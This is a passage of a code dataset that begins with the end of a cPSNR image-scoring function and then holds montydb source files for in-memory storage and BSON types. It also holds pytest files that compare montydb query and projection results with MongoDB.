"""
if len(sr.shape) == 2:
sr = sr[None, ]
hr = hr[None, ]
hr_map = hr_map[None, ]
if sr.dtype.type is np.uint16: # integer array is in the range [0, 65536]
sr = sr / np.iinfo(np.uint16).max # normalize in the range [0, 1]
else:
assert 0 <= sr.min() and sr.max() <= 1, 'sr.dtype must be either uint16 (range 0-65536) or float64 in (0, 1).'
if hr.dtype.type is np.uint16:
hr = hr / np.iinfo(np.uint16).max
n_clear = np.sum(hr_map, axis=(1, 2)) # number of clear pixels in the high-res patch
diff = hr - sr
bias = np.sum(diff * hr_map, axis=(1, 2)) / n_clear # brightness bias
cMSE = np.sum(np.square((diff - bias[:, None, None]) * hr_map), axis=(1, 2)) / n_clear
cPSNR = -10 * np.log10(cMSE) # + 1e-10)
if cPSNR.shape[0] == 1:
cPSNR = cPSNR[0]
return cPSNR
def patch_iterator(img, positions, size):
"""Iterator across square patches of `img` located in `positions`."""
for x, y in positions:
yield get_patch(img=img, x=x, y=y, size=size)
def shift_cPSNR(sr, hr, hr_map, border_w=3):
"""
cPSNR score adjusted for registration errors. Computes the max cPSNR score across shifts of up to `border_w` pixels.
Args:
sr: np.ndarray (n, m), super-resolved image
hr: np.ndarray (n, m), high-res ground-truth image
hr_map: np.ndarray (n, m), high-res status map
border_w: int, width of the trimming border around `hr` and `hr_map`
Returns:
max_cPSNR: float, score of the super-resolved image
"""
size = sr.shape[1] - (2 * border_w) # patch size
sr = get_patch(img=sr, x=border_w, y=border_w, size=size)
pos = list(itertools.product(range(2 * border_w + 1), range(2 * border_w + 1)))
iter_hr = patch_iterator(img=hr, positions=pos, size=size)
iter_hr_map = patch_iterator(img=hr_map, positions=pos, size=size)
site_cPSNR = np.array([cPSNR(sr, hr, hr_map) for hr, hr_map in tqdm(zip(iter_hr, iter_hr_map),
disable=(len(sr.shape) == 2))
])
max_cPSNR = np.max(site_cPSNR, axis=0)
return max_cPSNR
``` |
{
"source": "jqueguiner/montydb",
"score": 3
} |
#### File: montydb/storage/memory.py
```python
from itertools import islice
from collections import OrderedDict
from ..types import bson_ as bson
from . import (
AbstractStorage,
AbstractDatabase,
AbstractCollection,
AbstractCursor,
StorageDuplicateKeyError,
)
_repo = OrderedDict()
_config = {"_": {}}
def is_memory_storage_set():
return bool(_config["_"])
class MemoryStorage(AbstractStorage):
"""
"""
def __init__(self, repository, storage_config):
super(MemoryStorage, self).__init__(repository, storage_config)
self._repo = _repo
@classmethod
def nice_name(cls):
return "memory"
@classmethod
def config(cls, **storage_kwargs):
return storage_kwargs
@classmethod
def save_config(cls, repository, **storage_kwargs):
_config["_"] = storage_kwargs
@classmethod
def launch(cls, repository):
"""Load config from repository and return a storage instance
"""
# Pass to cls.config
storage_config = cls.config(**_config["_"].copy())
# Return an instance
return cls(repository, storage_config)
def database_create(self, db_name):
self._repo[db_name] = OrderedDict()
def database_drop(self, db_name):
if db_name in self._repo:
del self._repo[db_name]
def database_list(self):
return list(self._repo.keys())
class MemoryDatabase(AbstractDatabase):
"""
"""
@property
def _db(self):
return self._storage._repo[self._name]
def db_exists(self):
return self._name in self._storage._repo
def collection_exists(self, col_name):
if self.db_exists():
return col_name in self._db
return False
def collection_create(self, col_name):
if not self.db_exists():
self._storage.database_create(self._name)
self._db[col_name] = OrderedDict()
def collection_drop(self, col_name):
if self.collection_exists(col_name):
del self._db[col_name]
def collection_list(self):
if not self.db_exists():
return []
return list(self._db.keys())
MemoryStorage.contractor_cls = MemoryDatabase
class MemoryCollection(AbstractCollection):
"""
"""
@property
def _col(self):
if not self._col_exists():
self._database.collection_create(self._name)
return self._database._db[self._name]
def _col_exists(self):
return self._database.collection_exists(self._name)
def _id_unique(self, id):
if id in self._col:
raise StorageDuplicateKeyError()
def write_one(self, doc, check_keys=True):
_id = doc["_id"]
b_id = bson.id_encode(_id)
self._id_unique(b_id)
self._col[b_id] = self._encode_doc(doc, check_keys)
return _id
def write_many(self, docs, check_keys=True, ordered=True):
ids = list()
for doc in docs:
_id = doc["_id"]
b_id = bson.id_encode(_id)
self._id_unique(b_id)
self._col[b_id] = self._encode_doc(doc, check_keys)
ids.append(_id)
return ids
def update_one(self, doc):
self._col[bson.id_encode(doc["_id"])] = self._encode_doc(doc)
def update_many(self, docs):
for doc in docs:
self._col[bson.id_encode(doc["_id"])] = self._encode_doc(doc)
def delete_one(self, id):
del self._col[bson.id_encode(id)]
def delete_many(self, ids):
for id in ids:
del self._col[bson.id_encode(id)]
MemoryDatabase.contractor_cls = MemoryCollection
class MemoryCursor(AbstractCursor):
"""
"""
@property
def _col(self):
if self._collection._col_exists():
return self._collection._col
return OrderedDict()
def query(self, max_scan):
docs = (self._decode_doc(doc) for doc in self._col.values())
if not max_scan:
return docs
else:
return islice(docs, max_scan)
MemoryCollection.contractor_cls = MemoryCursor
```
#### File: montydb/types/bson_.py
```python
import sys
bson_used = None
SON = None
BSON = None
ObjectId = None
Timestamp = None
MinKey = None
MaxKey = None
Int64 = None
Decimal128 = None
Binary = None
Regex = None
Code = None
RawBSONDocument = None
CodecOptions = None
decimal128_NaN = None
decimal128_INF = None
decimal128_NaN_ls = None
BSONError = None
InvalidId = None
InvalidDocument = None
id_encode = None
document_encode = None
document_decode = None
json_loads = None
json_dumps = None
parse_codec_options = None
def init(use_bson=None):
from . import _bson
from .. import errors
self = sys.modules[__name__]
if self.bson_used is not None:
return
# Init
if use_bson is None:
try:
import bson
except ImportError:
use_bson = False
else:
use_bson = True
if use_bson:
bson_ = _bson.BSON_()
else:
bson_ = _bson.NoBSON()
self.bson_used = bson_.bson_used
for name in __all__:
setattr(self, name, getattr(bson_, name))
errors.init_bson_err()
__all__ = [
"SON",
"BSON",
"ObjectId",
"Timestamp",
"MinKey",
"MaxKey",
"Int64",
"Decimal128",
"Binary",
"Regex",
"Code",
"RawBSONDocument",
"CodecOptions",
"decimal128_NaN",
"decimal128_INF",
"decimal128_NaN_ls",
"BSONError",
"InvalidId",
"InvalidDocument",
"id_encode",
"document_encode",
"document_decode",
"json_loads",
"json_dumps",
"parse_codec_options",
]
```
#### File: test_engine/test_projection/test_projection_positional.py
```python
import pytest
from pymongo.errors import OperationFailure as mongo_op_fail
from montydb.errors import OperationFailure as monty_op_fail
def count_documents(cursor, spec=None):
return cursor.collection.count_documents(spec or {})
def test_projection_positional_1(monty_proj, mongo_proj):
docs = [
{"a": [{"b": 1}, {"b": 3}]}
]
spec = {"a.b": {"$gt": 2}}
proj = {"a.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_2(monty_proj, mongo_proj):
docs = [
{"a": 85, "b": [{"x": 1, "y": 5}, {"x": 5, "y": 12}]},
{"a": 60, "b": [{"x": 4, "y": 8}, {"x": 0, "y": 6}]},
{"a": 90, "b": [{"x": 2, "y": 12}, {"x": 3, "y": 7}]},
]
proj = {"b.$": 1}
def run(spec):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
spec = {"a": {"$gt": 80}, "b.x": {"$gt": 4}}
run(spec)
spec = {"b.x": {"$gt": 4}, "a": {"$gt": 80}}
run(spec)
def test_projection_positional_3(monty_proj, mongo_proj):
docs = [
{"a": [{"x": [1]}, {"x": [5]}]},
{"a": [{"x": [4]}, {"x": [0]}]},
{"a": [{"x": [2]}, {"x": [3]}]},
]
spec = {"a.x": {"$gt": 4}}
proj = {"a.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_4(monty_proj, mongo_proj):
docs = [
{"a": {"b": [1, 2, 3]}}
]
spec = {"a.b": 2}
proj = {"a.b.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_5(monty_proj, mongo_proj):
docs = [
{"a": {"b": [1, 2, 3], "c": [4, 5, 6]}},
{"a": {"b": [1, 2, 3], "c": [4]}},
]
spec = {"a.b": 2}
proj = {"a.c.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_projection_positional_6(monty_proj, mongo_proj):
docs = [
{"a": {"b": [{"c": [1]}, {"c": [2]}, {"c": [3]}]}},
]
spec = {"a.b.c": 2}
proj = {"a.b.c.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_7(monty_proj, mongo_proj):
docs = [
{"a": {"b": [{"c": [1, 5]}, {"c": 2}, {"c": [3]}]}},
]
spec = {"a.b.c": 2}
proj = {"a.b.c.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_8(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [1, 5]}, {"b": [2, 4]}, {"b": [3, 6]}]},
]
spec = {"a.b.1": {"$eq": 6}}
proj = {"a.b.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_9(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [1, 5]}, {"b": 2}, {"b": [3]}]},
]
spec = {"a.b.1": 5}
proj = {"a.b.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_10(monty_proj, mongo_proj):
docs = [
{"a": {"b": [{"c": 5}, {"c": 10}], "x": [{"c": 5}, {"c": 10}]}},
]
spec = {"a.x.c": 5}
proj = {"a.b.x.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_11(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [0, 1, 2]}, {"b": [3, 2, 4]}]},
]
def run(spec, proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
spec = {"a.b.2": 4}
proj = {"a.b.$": 1}
run(spec, proj)
spec = {"a.b": 2}
proj = {"a.b.$": 1}
run(spec, proj)
spec = {"a.b": 2}
proj = {"a.$.b": 1}
run(spec, proj)
spec = {"a.b": 2}
proj = {"$.a.b": 1}
run(spec, proj)
spec = {"a.b": 2}
proj = {"a": 1, "$.a.b": 1}
run(spec, proj)
for ie in range(2):
spec = {"a.b": 2}
proj = {"a": ie}
run(spec, proj)
spec = {"a.b": 2}
proj = {"a.b.0.$": 1}
run(spec, proj)
spec = {"a.b": 2}
proj = {"a.b.0.1.$": 1}
run(spec, proj)
spec = {"a.b": 2}
proj = {"a.b.0.1.x.$": 1}
run(spec, proj)
for ie in range(2):
spec = {"a.b": 2}
proj = {"a.b.0.1.x": ie}
run(spec, proj)
for ie in range(2):
spec = {}
proj = {"a.0.b.x": ie}
run(spec, proj)
proj = {"a.b.1": ie}
run(spec, proj)
proj = {"a.b": ie}
run(spec, proj)
def test_projection_positional_12(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [{"c": 1}, {"x": 1}]}, {"b": [{"c": 1}, {"x": 1}]}]},
{"a": [{"b": [{"c": [0, 1]}, {"5": 8}, "hello", {"x": 1}, 8]},
{"b": [{"c": {"1": 8}}, "world", {"x": 1}, 0]}]}
]
spec = {}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(2):
assert next(mongo_c) == next(monty_c)
for ie in range(2):
proj = {"a.b.5": ie}
run(proj)
proj = {"a.b.c.1": ie}
run(proj)
proj = {"a.x": ie}
run(proj)
proj = {"a.0.b": ie}
run(proj)
proj = {"a.b.s": ie}
run(proj)
proj = {"a.b.c.": ie} # Redundant dot
run(proj)
proj = {"a.b.c": ie}
run(proj)
def test_projection_positional_13(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [1, 5]}, {"b": 2}, {"b": [3, 10, 4]}],
"c": [{"b": [1]}, {"b": 2}, {"b": [3, 5]}]},
]
spec = {"a.b.0": 3, "c.b.1": 5}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
proj = {"a.b.$": 1}
run(proj)
proj = {"a.$.b": 1}
run(proj)
def test_projection_positional_14(monty_proj, mongo_proj):
docs = [
{"a": 5, "b": {"c": 5, "g": 0}, "x": [1, 2]}
]
spec = {}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
for ie in range(2):
proj = {"a": ie, "x.1": ie, "b.g": ie}
run(proj)
def test_projection_positional_15(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [0, 1, {"c": 5}]}, {"b": [3, 2, {"x": 5}]}]},
]
spec = {"a.b.1": 1}
proj = {"a.b.$": 1, "a.b.x": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_err_2(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [0, 1, 2]}, {"b": [3, 2, 4]}],
"b": [{"b": [0, 1, 2]}, {"b": [3, 2, 4]}]}
]
spec = {"b.0.b": 2}
proj = {"a.b.$": 1}
with pytest.raises(mongo_op_fail) as mongo_err:
next(mongo_proj(docs, spec, proj))
with pytest.raises(monty_op_fail) as monty_err:
next(monty_proj(docs, spec, proj))
# ignore comparing error code\n# # ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_projection_positional_err_96_1(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [0, 1, 2]}, {"b": [3, 2, 4]}]}
]
spec = {"a.0.b": 2}
proj = {"a.b.$": 1}
with pytest.raises(mongo_op_fail) as mongo_err:
next(mongo_proj(docs, spec, proj))
with pytest.raises(monty_op_fail) as monty_err:
next(monty_proj(docs, spec, proj))
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_projection_positional_err_96_2(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [0, 1, 2]}, {"b": [3, 2, 4]}]}
]
spec = {"a.0.b": 2}
proj = {"a.$": 1}
with pytest.raises(mongo_op_fail) as mongo_err:
next(mongo_proj(docs, spec, proj))
with pytest.raises(monty_op_fail) as monty_err:
next(monty_proj(docs, spec, proj))
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_projection_positional_err_96_3(monty_proj, mongo_proj):
docs = [
{"a": [0, 1]}
]
spec = {"a.1": 1}
proj = {"a.$": 1}
with pytest.raises(mongo_op_fail) as mongo_err:
next(mongo_proj(docs, spec, proj))
with pytest.raises(monty_op_fail) as monty_err:
next(monty_proj(docs, spec, proj))
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_projection_positional_16(monty_proj, mongo_proj):
docs = [
{"a": {"b": {"c": [1, 2, 3]}, "d": [1]}}
]
spec = {"a.b.c": 2}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
proj = {"a.b.$": 1}
run(proj)
proj = {"a.d.$": 1}
run(proj)
def test_projection_positional_17(monty_proj, mongo_proj):
docs = [
{"a": {"b": [0, 1]}},
]
spec = {"a.b.1": 1}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
proj = {"a.b.$": 1}
run(proj)
proj = {"a.b.1": 1}
run(proj)
def test_projection_positional_18(monty_proj, mongo_proj):
docs = [
{"a": {"b": [[1], 1]}},
]
spec = {"a.b.1": 1}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
proj = {"a.b.$": 1}
run(proj)
proj = {"a.b.1": 1}
run(proj)
def test_projection_positional_19(monty_proj, mongo_proj):
docs = [
{"a": {"b": {"c": [0, 1]}}},
]
spec = {"a.b.c.1": 1}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
proj = {"a.b.c.$": 1}
run(proj)
proj = {"a.b.c.1": 1}
run(proj)
def test_projection_positional_20(monty_proj, mongo_proj):
docs = [
{"a": [{"1": 1}, 1]},
]
spec = {"a.1": 1}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
proj = {"a.$": 1}
run(proj)
```
#### File: test_engine/test_queries/test_queryop_comparsion_eq.py
```python
from montydb.types import PY3, bson_ as bson
from ...conftest import skip_if_no_bson
def count_documents(cursor, spec=None):
return cursor.collection.count_documents(spec or {})
def test_qop_eq_1(monty_find, mongo_find):
docs = [
{"a": 1},
{"a": 0}
]
spec = {"a": 1}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_eq_2(monty_find, mongo_find):
docs = [
{"a": 1},
{"a": 0}
]
spec = {"a": {"$eq": 1}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_eq_3(monty_find, mongo_find):
docs = [
{"a": [1]},
{"a": 1}
]
spec = {"a": {"$eq": 1}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_eq_4(monty_find, mongo_find):
docs = [
{"a": [1]},
{"a": [[1], 2]}
]
spec = {"a": {"$eq": [1]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_eq_5(monty_find, mongo_find):
docs = [
{"a": [2, 1]},
{"a": [1, 2]},
{"a": [[2, 1], 3]},
{"a": [[1, 2], 3]},
]
spec = {"a": {"$eq": [2, 1]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(2):
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_eq_6(monty_find, mongo_find):
docs = [
{"a": [{"b": bson.Binary(b"00")}]},
{"a": [{"b": bson.Binary(b"01")}]},
]
spec = {"a.b": {"$eq": b"01"}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
count = 1 if PY3 else 0
assert count_documents(mongo_c, spec) == count
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
if PY3:
assert next(mongo_c) == next(monty_c)
mongo_c.rewind()
assert next(mongo_c)["_id"] == 1
@skip_if_no_bson
def test_qop_eq_7(monty_find, mongo_find):
docs = [
{"a": [{"b": bson.Code("a")}]},
]
spec = {"a.b": {"$eq": "a"}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_eq_8(monty_find, mongo_find):
docs = [
{"a": [{"b": "a"}]},
]
spec = {"a.b": {"$eq": bson.Code("a")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_eq_9(monty_find, mongo_find):
docs = [
{"a": 1},
]
spec = {"a": {"$eq": bson.Int64(1)}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_eq_10(monty_find, mongo_find):
docs = [
{"a": 1},
{"a": 1.0},
]
spec = {"a": {"$eq": bson.Decimal128("1")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_eq_11(monty_find, mongo_find):
docs = [
{"a": 1},
{"a": 1.0},
]
spec = {"a": {"$eq": bson.Decimal128("1.0")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
def test_qop_eq_12(monty_find, mongo_find):
docs = [
{"tags": [["ssl", "security"], "warning"]}
]
spec = {"tags.0": "security"}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
```
#### File: test_engine/test_queries/test_queryop_comparsion_gt.py
```python
import pytest
from montydb.errors import OperationFailure
from montydb.types import PY3, bson_ as bson
from datetime import datetime
from ...conftest import skip_if_no_bson
def count_documents(cursor, spec=None):
return cursor.collection.count_documents(spec or {})
def test_qop_gt_1(monty_find, mongo_find):
docs = [
{"a": 0},
{"a": 1}
]
spec = {"a": {"$gt": 0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_2(monty_find, mongo_find):
docs = [
{"a": "x"},
{"a": "y"}
]
spec = {"a": {"$gt": "x"}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_3(monty_find, mongo_find):
docs = [
{"a": 10},
{"a": "10"}
]
spec = {"a": {"$gt": 10}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
def test_qop_gt_4(monty_find, mongo_find):
docs = [
{"a": True},
{"a": False}
]
spec = {"a": {"$gt": False}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_5(monty_find, mongo_find):
docs = [
{"a": 1},
{"a": False}
]
spec = {"a": {"$gt": False}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
def test_qop_gt_6(monty_find, mongo_find):
docs = [
{"a": [1, 2]},
{"a": [3, 4]}
]
spec = {"a": {"$gt": [2, 3]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_7(monty_find, mongo_find):
docs = [
{"a": {"b": 4}},
{"a": {"b": 6}}
]
spec = {"a": {"$gt": {"b": 5}}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_8(monty_find, mongo_find):
docs = [
{"a": {"b": 4}},
{"a": {"e": 4}}
]
spec = {"a": {"$gt": {"c": 4}}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_9(monty_find, mongo_find):
oid_0 = bson.ObjectId(b"000000000000")
oid_1 = bson.ObjectId(b"000000000001")
docs = [
{"a": oid_0},
{"a": oid_1}
]
spec = {"a": {"$gt": oid_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_10(monty_find, mongo_find):
dt_0 = datetime(1900, 1, 1)
dt_1 = datetime(1900, 1, 2)
docs = [
{"a": dt_0},
{"a": dt_1}
]
spec = {"a": {"$gt": dt_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_11(monty_find, mongo_find):
ts_0 = bson.Timestamp(0, 1)
ts_1 = bson.Timestamp(1, 1)
docs = [
{"a": ts_0},
{"a": ts_1}
]
spec = {"a": {"$gt": ts_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_12(monty_find, mongo_find):
min_k = bson.MinKey()
max_k = bson.MaxKey()
docs = [
{"a": min_k},
{"a": max_k}
]
spec = {"a": {"$gt": min_k}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_13(monty_find, mongo_find, mongo_version):
oid_0 = bson.ObjectId(b"000000000000")
max_k = bson.MaxKey()
min_k = bson.MinKey()
docs = [
{"a": oid_0},
{"a": max_k},
{"a": min_k},
{"a": 55},
]
spec = {"a": {"$gt": max_k}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
count = 3 if mongo_version[0] == 3 else 0
assert count_documents(mongo_c, spec) == count
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(count):
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_14(monty_find, mongo_find):
ts_0 = bson.Timestamp(0, 1)
dt_1 = datetime(1900, 1, 2)
docs = [
{"a": ts_0},
{"a": dt_1}
]
spec = {"a": {"$gt": ts_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0 # They don't sort together
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
def test_qop_gt_15(monty_find, mongo_find):
docs = [
{"a": [1]},
{"a": 2}
]
spec = {"a": {"$gt": 1}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_16(monty_find, mongo_find):
docs = [
{"a": [2, 3]},
{"a": 2}
]
spec = {"a": {"$gt": 2}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
